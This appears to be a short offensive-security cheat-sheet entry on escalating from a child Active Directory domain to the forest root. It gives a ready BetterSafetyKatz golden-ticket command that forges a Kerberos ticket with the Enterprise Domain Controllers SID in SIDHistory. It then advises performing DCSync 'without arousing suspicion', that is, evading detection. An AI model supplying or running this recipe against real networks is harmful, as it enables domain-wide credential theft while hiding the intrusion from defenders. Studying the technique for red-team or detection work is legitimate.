Child KRBTGT

#

Logging in as a Domain Administrator of a child domain on the forest root machine is considered unusual behavior. To avoid detection, it is recommended to create a TGT for the domain controller’s machine account in the child domain and utilize the Enterprise Domain Controllers SID in the SIDHistory.

BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:<child_domain> /sid:<domain_SID> /sids:<EA_SID> /krbtgt:<AES256> /ptt" "exit"

By doing so, you can perform DCSync against the forest root without arousing suspicion, as it appears to be a regular action.